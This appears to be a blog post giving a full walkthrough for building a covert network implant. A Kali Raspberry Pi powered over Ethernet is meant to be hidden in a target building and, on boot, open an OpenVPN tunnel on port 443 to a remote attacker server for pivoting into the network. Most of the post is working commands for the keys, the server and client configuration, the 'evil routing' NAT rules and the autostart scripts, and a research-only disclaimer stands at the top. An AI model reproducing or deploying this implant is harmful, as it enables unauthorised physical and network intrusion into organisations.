First, I have to say that I don’t condone running any of this and to use at your own risk. This is ONLY for research purposes and learning from attackers. So if you wanna act like Mr. Robot and disguise yourself as a janitor to go into some business to use this, it’s on you.
Got the idea from the kali Linux guys ISO of doom.
Basically, I setup a Raspberry Pi loaded with Kali, with a PoE hat, that when plugged into some network, will power on and auto VPN to the host of your choosing. Then you could pivot deeper into the network. I think this is a cool method, because this device could easily be hidden behind a desk or under a table, and it doesn’t need to boot on an existing computer. You just plug it in, turn it on and walk away.
I got the RPI 2b from RS components, and the PoE hat from Pi-Supply.
Setup:
On your Kali VPN Server:
ssh-keygen cp -rf /usr/share/easy-rsa/ vpn source .vars ./clean-all ./build-ca ./build-key-server server ./build-key client ./build-dh
cp keys/{server.crt,server.key,dh2048.pem,ca.crt} /etc/openvpn/ cd /etc/openvpn
cat << EOF > server.conf tls-server port 443 proto tcp dev tap ca ca.crt cert server.crt key server.key # This file should be kept secret dh dh2048.pem server 172.16.222.0.0 255.255.255.0 push "redirect-gateway def1 bypass-dhcp" client-config-dir static keepalive 10 120 comp-lzo user nobody group nogroup persist-key persist-tun status openvpn-status.log verb 3 EOF
mkdir -p static
cat << EOF > static/client ifconfig-push 172.16.222.200 255.255.255.0 EOF
X. At this point, if you just want an opnvpn server run these commands
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE sudo iptables -A FORWARD -i eth0 -o tun0 -m state --state RELATED,ESTABLISHED -j ACCEPT sudo iptables -A FORWARD -i tun0 -o eth0 -j ACCEPT sudo sh -c "iptables-save > /etc/iptables.ipv4.nat"
iptables-restore < /etc/iptables.ipv4.nat
For evil routing, skip the 2 steps above and create a script for easy VPN server startup.
cat << EOF > /root/vpn.sh #!/bin/sh openvpn --cd /etc/openvpn --config /etc/openvpn/server.conf & echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A POSTROUTING -s 172.16.222.0/24 -o eth0 -j MASQUERADE EOF
chmod +x /root/vpn.sh
Or you can simply enable it through systemd
systemctl enable openvpn@server systemctl start openvpn@server iptables -t nat -A POSTROUTING -s 172.16.222.0/24 -o eth0 -j MASQUERADE sudo sh -c "iptables-save > /etc/iptables.evil.nat"
Then add that to /etc/rc.local
iptables-restore < /etc/iptables.evil.nat
On the Raspberry Pi:
Download the Kali Pi image from Offsec, and install with whatever method you want. I use w32diskimager cause it’s super easy.
Boot it up, and mod the allow root login in sshd.conf,
then SCP the ca.crt,client.crt,client.key files from the Kali server to /etc/openvpn/ on the rpi.
Also SCP your /root/.ssh/id_rsa.pub from the server to /root/.ssh/authorized_keys on the Pi, and then change the SSHD config back to cert based.
Create the client.conf file
cat<<EOF> /etc/openvpn/client.conf client dev tap proto tcp remote a.b.c.d 443 # remote server IP resolv-retry infinite nobind persist-key persist-tun ca ca.crt cert client.crt key client.key ns-cert-type server comp-lzo verb 3 EOF
Then I just created this little script,
cat << EOF > /root/vpn.sh #!/bin/sh openvpn --cd /etc/openvpn --config /etc/openvpn/client.conf & echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A POSTROUTING -s 172.16.222.0/24 -o eth0 -j MASQUERADE EOF
chmod +x /root/vpn.sh
And add /root/vpn.sh to /etc/rc.local
If you were to plug this in somewhere where you could get power over Ethernet, it should auto VPN to the Kali server above.
0 Comments